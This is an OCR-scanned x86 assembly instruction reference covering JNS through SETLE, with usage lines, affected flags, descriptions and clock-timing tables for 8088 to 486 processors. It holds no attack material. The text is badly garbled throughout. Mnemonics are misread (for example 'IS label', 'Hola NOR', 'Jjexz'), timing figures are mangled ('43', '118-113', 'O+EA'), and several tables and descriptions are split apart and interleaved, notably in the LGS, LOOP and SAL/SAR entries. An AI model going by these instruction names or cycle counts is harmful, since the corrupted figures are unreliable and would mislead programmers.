Signed comparision. 
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% Clocks size 


% Operands 808x 286 386 486 Bytes 
label: jump 16 7+m 7+m 3 2-4 
no jump 43 3 1 


- see -Instruction Timing- 
:jns 


AJINS - Jump Not Signed 


Usage: JNS label 
Modifies flags: None 


Causes execution to branch to "label" if the Sign Flag is clear. 
Signed comparision. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
label: jump 16 7+m 7+m 3 2-4 
no jump 43 3 1 


- see -Instruction Timing- 


:jnp:jpo 
AJINP/JPO - Jump Not Parity / Jump Parity Odd 


Usage: JNP label 
JPO label 
Modifies flags: None 


Causes execution to branch to "label" if the Parity Flag is clear. 
Unsigned comparision. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
label: jump 16 7+m 7+m 3 2-4 
no jump 43 3 1 


- see -Instruction Timing- 


:jo 
AJO - Jump on Overflow 


Usage: JO label 
Modifies flags: None 


Causes execution to branch to "label" if the Overflow Flag is set. 
Signed comparision. 
% Clocks Size 
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% Operands 808x 286 386 486 Bytes 
label: jump 16 7+m 7+m 3 2-4 
no jump 43 3 1 


- see —Instruction Timing- 
:jp:jpe 
AJP/JPE - Jump on Parity / Jump on Parity Even 


JPE label 
Modifies flags: None 


Causes execution to branch to "label" if the Parity Flag is set. 
Unsigned comparision. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
label: jump 16 7+m 7+m 3 2-4 
no jump 4.3 3 1 


- see —Instruction Timing- 
:js 
AJS - Jump Signed 


Usage: IS label 
Modifies flags: None 


Causes execution to branch to "label" if the Sign Flag is set. 
Signed comparision. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
label: jump 16 7+m 7+m 3 2-4 
no jump 43 3 1 


- see —Instruction Timing- 
:lahf 
ALAHF - Load Register AH From Flags 
Usage: LAHF 
Modifies flags: None 
Copies bits 0-7 of the flags register into AH. This includes flags 
AF, CF, PF, SF and ZF other bits are undefined. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
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none 4 2 2 3 1 


- see —-Instruction Timing- 


:lar 
ALAR - Load Access Rights (286+ protected) 


Usage: LAR  dest,src 
Modifies flags: ZF 


The high byte of the of the destination register is overwritten by 
the value of the access rights byte and the low order byte is zeroed 
depending on the selection in the source operand. The Zero Flag is 
set if the load operation is successful. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg16, reg16 - 14 15 11 3 
reg32, reg32 - - 15 11 3 
reg16, mem16 - 16 16 11 3-7 
reg32, mem32 - - 16 11 3-7 


- see —Instruction Timing- 


:1ds 
ALDS - Load Pointer Using DS 


Usage: LDS  dest,src 
Modifies flags: None 


Loads 32-bit pointer from memory source to destination register 

and DS. The offset is placed in the destination register and the 
segment is placed in DS. To use this instruction the word at the 
lower memory address must contain the offset and the word at the 
higher address must contain the segment. This simplifies the loading 
of far pointers from the stack and the interrupt vector table. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg16, mem32 16+EA 7 7 6 2-4 
reg,mem (PM) - - 22 12 5-7 


- see —Instruction Timing- 
:lea 
ALEA - Load Effective Address 


Usage: LEA  dest,src 
Modifies flags: None 


Transfers offset address of "src" to the destination register. 
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% Clocks Size 
% Operands 808x 286 386 486 Bytes 


reg, mem 2+EA 3 2 1 2-4 


- see -Instruction Timing- 


: leave 
ALEAVE - Restore Stack for Procedure Exit (80188+) 


Usage: LEAVE 
Modifies flags: None 


Releases the local variables created by the previous -ENTER- 
instruction by restoring SP and BP to their condition before 
the procedure stack frame was initialized. 


% Clocks size 
% Operands 808x 286 386 486 Bytes 
none - 5 4 5 1 


- see —Instruction Timing- 


:les 
ALES - Load Pointer Using ES 


Usage: LES. dest,src 
Modifies flags: None 


Loads 32-bit pointer from memory source to destination register 

and ES. The offset is placed in the destination register and the 
segment is placed in ES. To use this instruction the word at the 
lower memory address must contain the offset and the word at the 
higher address must contain the segment. This simplifies the loading 
of far pointers from the stack and the interrupt vector table. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg, mem 16+EA 7 7 6 2-4 (W88=24+EA) 
reg,mem (PM) - - 22 12 5-7 


- see —Instruction Timing- 


:1fs 
ALFS - Load Pointer Using FS (386+ only) 


Usage: LFS. dest,src 
Modifies flags: None 
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Loads 32-bit pointer from memory source to destination register 

and FS. The offset is placed in the destination register and the 
segment is placed in FS. To use this instruction the word at the 
lower memory address must contain the offset and the word at the 
higher address must contain the segment. This simplifies the loading 
of far pointers from the stack and the interrupt vector table. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg, mem - - 7 6 5-7 
reg,mem (PM) - - 22 12 5-7 


- see —-Instruction Timing- 
:lgdt 
ALGDT - Load Global Descriptor Table (286+ privileged) 


Usage: LGDT src 
Modifies flags: None 


Loads a value from an operand into the Global Descriptor Table 
(-GDT-) register. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
mem64 - 11 11 11 5 


- see —Instruction Timing- 
:lidt 
ALIDT - Load Interrupt Descriptor Table (286+ privileged) 


Usage: LIDT src 
Modifies flags: None 


Loads a value from an operand into the Interrupt Descriptor Table 
(IDT) register. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
mem64 - 12 11 11 5 


- see —Instruction Timing- 

:1gs 

ALGS - Load Pointer Using GS (386+ only) 
Usage: LGS dest, src 


Modifies flags: None 
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% 
% 


:l1ldt 
ALLDT 


% 
% 


:lmsw 
ALMSW 


% 
% 


: lock 


Loads 32-bit pointer from memory source to destination register 

and GS. The offset is placed in the destination register and the 
segment is placed in GS. To use this instruction the word at the 
lower memory address must contain the offset and the word at the 
higher address must contain the segment. This simplifies the loading 
of far pointers from the stack and the interrupt vector table. 


Clocks Size 
Operands 808x 286 386 486 Bytes 
reg, mem - - 7 6 5-7 
reg,mem (PM) - - 22 12 5-7 


- see —Instruction Timing- 


- Load Local Descriptor Table (286+ privileged) 


Usage: LLDT src 
Modifies flags: None 


Loads a value from an operand into the Local Descriptor Table 
Register (LDTR). 


Clocks Size 
Operands 808x 286 386 486 Bytes 
reg16 - 17 20 11 3 
mem16 - 19 24 11 5 


- see —Instruction Timing- 


- Load Machine Status Word (286+ privileged) 


Usage: LMSW  src 
Modifies flags: None 


Loads the Machine Status Word (-MSW-) from data found at "src" 


Clocks Size 
Operands 808x 286 386 486 Bytes 
reg16 - 3 10 13 3 
mem16 - 6 13 13 5 


- see -Instruction Timing- 


ALOCK - Lock Bus 
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% 
% 


:lods: 
ALODS 


% 
% 


:loop 
ALOOP 


% 
% 


Usage: LOCK 
LOCK: (386+ prefix) 
Modifies flags: None 


This instruction is a prefix that causes the CPU assert bus lock 
signal during the execution of the next instruction. Used to 
avoid two processors from updating the same data location. The 
286 always asserts lock during an XCHG with memory operands. This 


should only be used to lock the bus prior to -XCHG-, -MOV-, -IN- and 


-OUT- instructions. 


Clocks size 
Operands 808x 286 386 486 Bytes 
none 2 (0) (0) 1 1 


- see —Instruction Timing- 


lodsb:lodsw:lodsd 
- Load String (Byte, Word or Double) 


Usage: LODS src 
LODSB 
LODSW 
LODSD (386+ only) 
Modifies flags: None 


Transfers string element addressed by DS:SI (even if an operand is 
supplied) to the accumulator. SI is incremented based on the size 
of the operand or based on the instruction used. If the Direction 
Flag is set SI is decremented, if the Direction Flag is clear SI 
is incremented. Use with REP prefixes. 


Clocks Size 
Operands 808x 286 386 486 Bytes 
src 12/16 5 5 5 1 


- see —Instruction Timing- 


- Decrement CX and Loop if CX Not Zero 


Usage: LOOP label 
Modifies flags: None 


Decrements CX by 1 and transfers control to "label" if CX is not 
Zero. The "label" operand must be within -128 or 127 bytes of the 
instruction following the loop instruction 


Clocks Size 
Operands 808x 286 386 486 Bytes 
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label: jump 18 8+m 11+m 6 2 
no jump 5 4 ? 2 


- see -—Instruction Timing- 


:loope:loopz 
ALOOPE/LOOPZ - Loop While Equal / Loop While Zero 


Usage: LOOPE label 
LOOPZ label 
Modifies flags: None 


Decrements CX by 1 (without modifying the flags) and transfers 
control to "label" if CX != © and the Zero Flag is set. The 
"label" operand must be within -128 or 127 bytes of the instruction 
following the loop instruction. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
label: jump 18 8+m 11+m 9 2 
no jump 5 4 ? 6 


- see -Instruction Timing- 


:loopnz:loopne 
ALOOPNZ/LOOPNE - Loop while Not Zero / Loop While Not Equal 


Usage: LOOPNZ label 
LOOPNE label 
Modifies flags: None 


Decrements CX by 1 (without modifying the flags) and transfers 
control to "label" if CX != 0 and the Zero Flag is clear. The 
"label" operand must be within -128 or 127 bytes of the instruction 
following the loop instruction. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
label: jump 19 8+m 11+m 9 2 
no jump 5 4 ? 6 


- see —Instruction Timing- 


:1sl 
ALSL - Load Segment Limit (286+ protected) 


Usage: LSL  dest,src 
Modifies flags: ZF 


Loads the segment limit of a selector into the destination register 
if the selector is valid and visible at the current privilege level. 
If loading is successful the Zero Flag is set, otherwise it is 
cleared. 
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% Clocks size 


% Operands 808x 286 386 486 Bytes 
reg16, reg16 - 14. 20/25 10 3 
reg32, reg32 - - 20/25 10 3 
reg16, mem16 - 16 21/26 10 5 
reg32, mem32 - - 21/26 10 5 


- 386 times are listed "byte granular" / "page granular" 
- see —Instruction Timing- 

:1ss 

ALSS - Load Pointer Using SS (386+ only) 


Usage: LSS. dest,src 
Modifies flags: None 


Loads 32-bit pointer from memory source to destination register 

and SS. The offset is placed in the destination register and the 
segment is placed in SS. To use this instruction the word at the 
lower memory address must contain the offset and the word at the 
higher address must contain the segment. This simplifies the loading 
of far pointers from the stack and the interrupt vector table. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg, mem - - 7 6 5-7 
reg,mem (PM) - - 22 12 5-7 


- see -Instruction Timing- 


:ltr 
ALTR - Load Task Register (286+ privileged) 


Usage: LTR Ci de 
Modifies flags: None 


Loads the current task register with the value specified in "src" 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg16 - 17 23 20 3 
mem16 - 19 27 20 5 


- see —Instruction Timing- 


: MOV 
AMOV - Move Byte or Word 


Usage: MOV dest,src 
Modifies flags: None 
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% 
% 


Copies byte or word from the source operand to the destination 
operand. If the destination is SS interrupts are disabled except 
on early buggy 808x CPUs. Some CPUs disable interrupts if the 
destination is any of the segment registers 


Clocks Size 
Operands 808x 286 386 486 Bytes 
reg, reg 2 2 2 1 2 
mem, reg O+EA 3 2 1 2-4 (W88=13+EA) 
reg, mem 8+EA 5 4 1 2-4 (W88=12+EA) 
mem, immed —10+EA 3 2 1 3-6 (W88=14+EA) 
reg, immed 4.2 2 1 2-3 
mem, accum 10 3 2 1 3 (W88=14) 
accum, mem 10 5 4 1 3 (W88=14) 
segreg, reg16 2 2 2 3 2 
segreg, mem16 8+EA 5 5 9 2-4 (W88=12+EA) 
reg16, segreg 2 2 2 3 2 
mem16, segreg 9+EA 3 2 3 2-4 (W88=13+EA) 
reg32, CRO/CR2/CR3 - - 6 4 
CRO, reg32 - - 10 16 
CR2, reg32 - - 4 4 3 
CR3, reg32 - - 5 4 3 
reg32, DRO/DR1/DR2/DR3  - 22. 10 3 
reg32, DR6/DR7 - - 22 10 3 
DRO/DR1/DR2/DR3, reg32 - 22 11 3 
DR6/DR7, reg32 - - 16 11 3 
reg32, TR6/TR7 - - 12 4 3 
TR6/TR7,reg32 - - 12 4 3 
reg32, TR3 3 
TR3, reg32 6 


- when the 386 special registers are used all operands are 32 bits 
- see —Instruction Timing- 


:movs:movsb:movsw:movsd 
AMOVS - Move String (Byte or Word) 
Usage: MOVS dest,src 
MOVSB 
MOVSW 
MOVSD (386+ only) 
Modifies flags: None 
Copies data from addressed by DS:SI (even if operands are given) to 
the location ES:DI destination and updates SI and DI based on the 
size of the operand or instruction used. SI and DI are incremented 
when the Direction Flag is cleared and decremented when the Direction 
Flag is Set. Use with -REP- prefixes. 
% Clocks Size 
% Operands 808x 286 386 486 Bytes 
dest, src 18 5 7 7 1 (W88=26) 
- see —Instruction Timing- 
1 MOVSX 
AMOVSX - Move with Sign Extend (386+ only) 
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Usage: MOVSX dest, src 
Modifies flags: None 


Copies the value of the source operand to the destination register 
with the sign extended. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg, reg - - 3 3 3 
reg, mem - - 6 3 3-7 


- see —Instruction Timing- 
:MOVZX 


AMOVZX - Move with Zero Extend (386+ only) 


Usage: MOVZX dest, src 
Modifies flags: None 


Copies the value of the source operand to the destination register 
with the zeroes extended. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg, reg - - 3 3 3 
reg, mem - - 6 3 3-7 


- see —Instruction Timing- 


:mul 
AMUL - Unsigned Multiply 


Usage: MUL Src 
Modifies flags: CF OF (AF,PF,SF,ZF undefined) 


Unsigned multiply of the accumulator by the source. If "src" is 
a byte value, then AL is used as the other multiplicand and the 
result is placed in AX. If "src" is a word value, then AX is 
multiplied by "src" and DX:AX receives the result. If "src" is 

a double word value, then EAX is multiplied by "src" and EDX:EAX 
receives the result. The 386+ uses an early out algorithm which 
makes multiplying any size value in EAX as fast as in the 8 or 16 
bit registers. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
reg8 70-77 13 9-14 13-18 2 
reg16 118-113 21 9-22 13-26 2 
reg32 - - 9-38 13-42 2-4 
mem8 (76-83)+EA 16 12-17 13-18 2-4 
mem16 (124-139)+EA 24 12-25 13-26 2-4 
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mem32 > - 12-21 13-42 2-4 


- see —-Instruction Timing- -IMUL- 
:neg 


ANEG - Two's Complement Negation 


Usage: NEG dest 
Modifies flags: AF CF OF PF SF ZF 


Subtracts the destination from 0 and saves the 2s complement of 
"dest" back into "dest". 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
reg 3 2 2 1 2 
mem 16+EA 7 6 3 2-4 (W88=24+EA) 


- see —Instruction Timing- 
:nop 


ANOP - No Operation (90h) 


Usage: NOP 
Modifies flags: None 


This is a do nothing instruction. It results in occupation of both 
space and time and is most useful for patching code segments. 


% Clocks size 
% Operands 808x 286 386 486 Bytes 
none 3 3 3 1 1 


- see —Instruction Timing- 

:not 

ANOT - One's Compliment Negation (Logical NOT) 
Usage: NOT dest 


Modifies flags: None 


Inverts the bits of the "dest" operand forming the 1s complement. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
reg 3 2 2 1 2 
mem 16+EA 7 6 3 2-4 (W88=24+EA) 
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- see —-Instruction Timing- 


Hola 
NOR - Inclusive Logical OR 


Usage: OR dest, src 
Modifies flags: CF OF PF SF ZF (AF undefined) 


Logical inclusive OR of the two operands returning the result in 
the destination. Any bit set in either operand will be set in the 


destination. 
% Clocks size 
% Operands 808x 286 386 486 Bytes 
reg, reg 3 2 2 1 2 
mem, reg 16+EA 7 7 3 2-4 (W88=24+EA) 
reg, mem O+EA 7 6 2 2-4 (W88=13+EA) 
reg, immed 4.3 2 1 3-4 
mem8, immed8 17+EA 7 7 3 3-6 
mem16, immed16 25+EA 7 7 3 3-6 
accum, immed 4 3 2 1 2-3 


- see —Instruction Timing- 


: Out 
NAOUT - Output Data to Port 


Usage: OUT port, accum 
Modifies flags: None 


Transfers byte in AL,word in AX or dword in EAX to the specified 
hardware port address. If the port number is in the range of 0-255 
it can be specified as an immediate. If greater than 255 then the 
port number must be specified in DX. Since the PC only decodes 10 
bits of the port address, values over 1023 can only be decoded by 
third party vendor equipment and also map to the port range 0-1023. 


% Clocks size 
% Operands 808x 286 386 486 Bytes 
immed8, accum 10/14 3 10 16 2 
immed8, accum (PM) - - 4/24 11/31/29 2 
DX, accum 8/12 3 11 16 1 
DX, accum (PM) - - 5/25 10/30/29 1 


- 386+ protected mode timings depend on privilege levels. 


first number is the timing when: CPL 6 IOPL 
second number is the timing when: CPL > IOPL 
third number is the timing when: virtual mode on 486 processor 


- see -Instruction Timing- 
:outs:outsb:outsw:outsd 
AOUTS - Output String to Port (80188+ only) 
Usage: OUTS port,src 
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OUTSB 

OUTSW 

OUTSD (386+ only) 
Modifies flags: None 


Transfers a byte, word or doubleword from "src" to the hardware 
port specified in DX. For instructions with no operands the "src" 
is located at DS:SI and SI is incremented or decremented by the 
size of the operand or the size dictated by the instruction format. 
when the Direction Flag is set SI is decremented, when clear, SI is 
incremented. If the port number is in the range of 0-255 it can 

be specified as an immediate. If greater than 255 then the port 
number must be specified in DX. Since the PC only decodes 10 bits 
of the port address, values over 1023 can only be decoded by third 
party vendor equipment and also map to the port range 0-1023. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
port, src - 5 14 17 1 
port,src (PM) - - 8/28 10/32/30 1 


- 386+ protected mode timings depend on privilege levels. 


first number is the timing when: CPL 6 IOPL 
second number is the timing when: CPL > IOPL 
third number is the timing when: virtual mode on 486 processor 


- see —-Instruction Timing- 


: POp 
APOP - Pop Word off Stack 


Usage: POP. dest 
Modifies flags: None 


Transfers word at the current stack top (SS:SP) to the destination 
then increments SP by two to point to the new stack top. CS is not 
a valid destination. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg16 8 5 4 4 1 
reg32 4 - 4 1 
segreg 8 5 7 3 il 
mem16 17+EA 5 5 6 2-4 
mem32 5 - - 6 2-4 


- see —Instruction Timing- 

:popa:popad 

APOPA/POPAD - Pop All Registers onto Stack (80188+ only) 
Usage: POPA 
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% 
% 


:popf 


POPAD (386+ only) 
Modifies flags: None 


Pops the top 8 words off the stack into the 8 general purpose 16/32 
bit registers. Registers are popped in the following order: (E)DI, 
(E)SI, (E)BP, (E)SP, (E)DX, (E)CX and (E)AX. The (E)SP value popped 
from the stack is actually discarded. 


Clocks size 
Operands 808x 286 386 486 Bytes 
none - 19 24 9 1 


- see —Instruction Timing- 


:popfd 


APOPF/POPFD - Pop Flags off Stack 


% 
% 


‘push 
APUSH 


% 
% 


Usage: POPF 
POPFD (386+ only) 
Modifies flags: all flags 


Pops word/doubleword from stack into the Flags Register and then 
increments SP by 2 (for POPF) or 4 (for POPFD). 


Clocks Size 
Operands 808x 286 386 486 Bytes 
none 8/12 5 5 9 1 (W88=12) 
none (PM) - - 5 6 1 


- see -Instruction Timing- 


- Push Word onto Stack 


Usage: PUSH src 
PUSH immed (80188+ only) 
Modifies flags: None 


Decrements SP by the size of the operand (two or four, byte values 
are sign extended) and transfers one word from source to the stack 
top (SS:SP). 


Clocks Size 
Operands 808x 286 386 486 Bytes 
reg16 11/15 3 2 1 1 
reg32 - - 2 1 1 
mem16 16+EA 5 5 4 2-4 (W88=24+EA) 
mem32 - - 5 4 2-4 
segreg 10/14 3 2 3 1 
immed - 3 2 1 2-3 
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- see —Instruction Timing- 


:pusha:pushad 
APUSHA/PUSHAD - Push All Registers onto Stack (80188+ only) 


Usage: PUSHA 
PUSHAD (386+ only) 
Modifies flags: None 


Pushes all general purpose registers onto the stack in the following 
order: (E)AX, (E)CX, (E)DX, (E)BX, (E)SP, (E)BP, (E)SI, (E)DI. The 
value of SP is the value before the actual push of SP. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
none - 19 24 11 1 


- see —Instruction Timing- 


:pushf:pushfd 
APUSHF/PUSHFD - Push Flags onto Stack 


Usage: PUSHF 
PUSHFD (386+ only) 
Modifies flags: None 


Transfers the Flags Register onto the stack. PUSHF saves a 16 bit 
value while PUSHFD saves a 32 bit value. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
none 10/14 3 4 4 1 
none (PM) - - 4 3 1 


- see —Instruction Timing- 


:rcl 
ARCL - Rotate Through Carry Left 


Usage: RCL  dest,count 
Modifies flags: CF OF 


Rotates the bits in the destination to the left "count" times with 
all data pushed out the left side re-entering on the right. The 
Carry Flag holds the last bit rotated out. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg, 1 2 2 9 3 2 
mem, 1 15+EA 7 10 4 2-4 (W88=23+EA) 
reg, CL 8+4n  5+n 9 8-30 2 
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mem, CL 20+EA+4n 8+n 10 
reg, immed8 - 5+n 9 8-30 
mem, immed8 - 8+n 10 9-31 


- see —Instruction Timing- 


:rcr 
ARCR - Rotate Through Carry Right 


Usage: RCR _ dest,count 
Modifies flags: CF OF 


2-4 (W88=28+EA+4n) 


Rotates the bits in the destination to the right "count" times with 
all data pushed out the right side re-entering on the left. The 
Carry Flag holds the last bit rotated out. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
reg, 1 2 2 9 3 2 
mem, 1 15+EA 7 10 4 2-4 (W88=23+EA) 
reg, CL 8+4n  5+n 9 8-30 2 
mem, CL 20+EA+4n 8+n 10 9-31 2-4 (W88=28+EA+4n) 
reg, immed8 - 5+n 9 8-30 3 
mem, immed8 - 8+n 10 9-31 3-5 
- see —Instruction Timing- 
:rep 
AREP - Repeat String Operation 
Usage: REP 
Modifies flags: None 
Repeats execution of string instructions while CX != 0. After 


each string operation, CX is decremented and the Zero Flag is 

tested. The combination of a repeat prefix and a segment override 
on CPU's before the 386 may result in errors if an interrupt occurs 
before CX=0. The following code shows code that is susceptible to 


this and how to avoid it: 


again: rep movs byte ptr ES:[DI],ES:[SI] 


I 


vulnerable instr. 


Jjexz next ; continue if REP successful 
loop again ; interrupt goofed count 
next: 
% Clocks Size 
% Operands 808x 286 386 486 Bytes 
none 2 2 2 1 
- see —Instruction Timing- -REPE- —REPNE- 
:repe:repz 


AREPE/REPZ - Repeat Equal / Repeat Zero 


Usage: REPE 
REPZ 
Modifies flags: None 
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% 
% 


Repeats execution of string instructions while CX != 0 and the Zero 
Flag is set. CX is decremented and the Zero Flag tested after 

each string operation. The combination of a repeat prefix and a 
segment override on processors other than the 386 may result in 
errors if an interrupt occurs before CX=0. 


Clocks size 
Operands 808x 286 386 486 Bytes 
none 2 2 2 1 


- see —Instruction Timing- 


:repne:repnz 
AREPNE/REPNZ - Repeat Not Equal / Repeat Not Zero 


% 
% 


Usage: REPNE 
REPNZ 
Modifies flags: None 


Repeats execution of string instructions while CX != 0 and the Zero 
Flag is clear. CX is decremented and the Zero Flag tested after 
each string operation. The combination of a repeat prefix and a 
segment override on processors other than the 386 may result in 
errors if an interrupt occurs before CX=0. 


Clocks size 
Operands 808x 286 386 486 Bytes 
none 2 2 2 1 


- see —Instruction Timing- 


:ret:retf:retn 
ARET/RETF - Return From Procedure 


% 
% 


Usage: RET nBytes 
RETF nBytes 
RETN nBytes 
Modifies flags: None 


Transfers control from a procedure back to the instruction address 
saved on the stack. "n bytes" is an optional number of bytes to 
release. Far returns pop the IP followed by the CS, while near 
returns pop only the IP register. 


Clocks size 
Operands 808x 286 386 486 Bytes 
retn 16/20 11+m 10+m 5 1 
retn immed 20/24 11+m 10+m 5 3 
retf 26/34 15+m 18+m 13 1 
retf (PM, same priv.) - 32+Mm 18 1 
retf (PM, lesser priv.) - 68 33 1 
retf immed 25/33 15+m 18+m 14 3 
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retf immed (PM, same priv.) 32+m 17 1 
retf immed (PM, lesser priv.) 68 33 1 


- see —-Instruction Timing- 


:rol 
AROL - Rotate Left 


Usage: ROL dest,count 
Modifies flags: CF OF 


Rotates the bits in the destination to the left "count" times with 
all data pushed out the left side re-entering on the right. The 
Carry Flag will contain the value of the last bit rotated out. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
reg, 1 2 2 3 3 2 
mem, 1 15+EA 7 7 4 2-4 (W88=23+EA) 
reg, CL 8+4n  5+n 3 3 2 
mem, CL 20+EA+4n 8+n 7 4 2-4 (W88=28+EA+4n) 
reg, immed8 - 5+n 3 2 3 
mem, immed8 - 8+n 7 4 3-5 


- see —-Instruction Timing- 


:ror 
AROR - Rotate Right 


Usage: ROR  dest,count 
Modifies flags: CF OF 


Rotates the bits in the destination to the right "count" times with 
all data pushed out the right side re-entering on the left. The 
Carry Flag will contain the value of the last bit rotated out. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
reg, 1 2 2 3 3 2 
mem, 1 15+EA 7 7 4 2-4 (W88=23+EA) 
reg, CL 8+4n 5+n 3 3 2 
mem, CL 20+EA+4n 8+n 7 4 2-4 (W88=28+EA+4n) 
reg, immed8 - 5+n 3 2 3 
mem, immed8 - 8+n 7 4 3-5 


- see —Instruction Timing- 
:sahf 
ASAHF - Store AH Register into FLAGS 


Usage: SAHF 
Modifies flags: AF CF PF SF ZF 


Transfers bits 0-7 of AH into the Flags Register. This includes 
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AF, CF, PF, SF and ZF. 


% Clocks 


% Operands 808x 286 386 


none 4 2 3 


- see —Instruction Timing- 


:sal:shl 


Size 
486 Bytes 
2 1 


ASAL/SHL - Shift Arithmetic Left / Shift Logical Left 


Usage: 
SHL 


SAL dest, count 
dest, count 


Modifies flags: CF OF PF SF ZF (AF undefined) 


Shifts the destination left by "count" bits with zeroes shifted 


in on right. 


% Clocks 

% Operands 808x 286 386 
reg, 1 2 2 3 
mem, 1 15+EA 7 7 
reg, CL 8+4n  5+n 
mem, CL 20+EA+4n 8+n 
reg, immed8 - 5+n 3 
mem, immed8 - 8+n 7 


- see —-Instruction Timing- 


: sar 
ASAR - Shift Arithmetic Right 
SAR 


Usage: dest, count 


The Carry Flag contains the last bit shifted out. 


Size 
486 Bytes 
3 2 
4 2-4 (W88=23+EA) 
3 3 2 
7 4 2-4 (W88=28+EA+4n) 
2 3 
4 3-5 


Modifies flags: CF OF PF SF ZF (AF undefined) 


Shifts the destination right by "count" bits with the current sign 


bit replicated in the leftmost bit. 


last bit shifted out. 


% Clocks 

% Operands 808x 286 386 
reg, 1 2 2 3 
mem,1 15+EA 7 7 
reg, CL 8+4n  5+n 
mem, CL 20+EA+4n 8+n 
reg, immed8 - 5+n 3 
mem, immed8 - 8+n 7 


- see —Instruction Timing- 


:sbb 
ASBB - Subtract with Borrow 


Usage: SBB  dest,src 
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The Carry Flag contains the 


Size 
486 Bytes 
3 2 
4 2-4 (W88=23+EA) 
3 3 2 
7 4 2-4 (W88=28+EA+4n) 
2 3 
4 3-5 


Modifies flags: AF CF OF PF SF ZF 


Subtracts the source from the destination, and subtracts 1 extra if 


the Carry Flag is set. Results are returned in "dest". 

% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg, reg 3 2 2 1 2 
mem, reg 16+EA 7 6 3 2-4 (W88=24+EA) 
reg, mem 9+EA 7 7 2 2-4 (W88=13+EA) 
reg, immed 4.3 2 1 3-4 
mem, immed —17+EA 7 7 3 3-6 (W88=25+EA) 
accum, immed 4 3 2 1 2-3 


- see -Instruction Timing- 


:scas:scasb:scasw:scasd 
ASCAS - Scan String (Byte, Word or Doubleword) 


Usage: SCAS string 
SCASB 
SCASW 
SCASD (386+ only) 
Modifies flags: AF CF OF PF SF ZF 


Compares value at ES:DI (even if operand is specified) from the 
accumulator and sets the flags similar to a subtraction. DI is 
incremented/decremented based on the instruction format (or 
operand size) and the state of the Direction Flag. Use with REP 


prefixes. 
% Clocks Size 
% Operands 808x 286 386 486 Bytes 
string 15 7 7 6 1 (W88=19) 


- see —Instruction Timing- 


:setae:setnb 
ASETAE/SETNB - Set if Above or Equal / Set if Not Below 
A(unsigned, 386+ only) 


Usage: SETAE dest 
SETNB dest 
Modifies flags: none 


Sets the byte in the operand to 1 if the Carry Flag is clear 
otherwise sets the operand to 0. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
reg8 - - 4 3 3 
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mem8 - - 5 4 3 


- see —-Instruction Timing- 


:setb:setnae 
ASETB/SETNAE - Set if Below / Set if Not Above or Equal 
A(unsigned, 386+ only) 


Usage: SETB dest 
SETNAE dest 
Modifies flags: none 


Sets the byte in the operand to 1 if the Carry Flag is set 
otherwise sets the operand to 0. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg8 - - 4 3 3 
mem8 - - 5 4 3 


- see —-Instruction Timing- 


:sethe:setna 
ASETBE/SETNA - Set if Below or Equal / Set if Not Above 
A(unsigned, 386+ only) 


Usage: SETBE dest 
SETNA dest 
Modifies flags: none 


Sets the byte in the operand to 1 if the Carry Flag or the Zero 
Flag is set, otherwise sets the operand to 0. 


% Clocks size 

% Operands 808x 286 386 486 Bytes 
reg8 - - 4 3 3 
mem8 - - 5 4 3 


- see -Instruction Timing- 
:sete:Setz 
ASETE/SETZ - Set if Equal / Set if Zero (386+ only) 


Usage: SETE dest 
SETZ dest 
Modifies flags: none 


Sets the byte in the operand to 1 if the Zero Flag is set, 
otherwise sets the operand to 0. 
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% Clocks size 


% Operands 808x 286 386 486 Bytes 
reg8 - - 4 3 3 
mem8 = - 5 4 3 


- see -Instruction Timing- 


:setne:setnz 
ASETNE/SETNZ - Set if Not Equal / Set if Not Zero (386+ only) 


Usage: SETNE dest 
SETNZ dest 
Modifies flags: none 


Sets the byte in the operand to 1 if the Zero Flag is clear, 
otherwise sets the operand to 0. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg8 - - 4 3 3 
mem8 - - 5 4 3 


- see —Instruction Timing- 


:setl:setnge 
ASETL/SETNGE - Set if Less / Set if Not Greater or Equal 
A(signed, 386+ only) 


Usage: SETL dest 
SETNGE dest 
Modifies flags: none 


Sets the byte in the operand to 1 if the Sign Flag is not equal 
to the Overflow Flag, otherwise sets the operand to 0. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg8 - - 4 3 3 
mem8 - - 5 4 3 


- see —-Instruction Timing- 


:setge:setnl 
ASETGE/SETNL - Set if Greater or Equal / Set if Not Less 
A(signed, 386+ only) 


Usage: SETGE dest 
SETNL dest 
Modifies flags: none 
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Sets the byte in the operand to 1 if the Sign Flag equals the 
Overflow Flag, otherwise sets the operand to 0. 


% Clocks 

% Operands 808x 286 386 486 
reg8 - - 4 3 
mem8 - - 5 4 


- see -Instruction Timing- 


:setle:setng 


Size 
Bytes 


3 
3 


ASETLE/SETNG - Set if Less or Equal / Set if Not greater or Equal 


A(signed, 386+ only) 


SETLE dest 
SETNG dest 
Modifies flags: none 


Usage: 


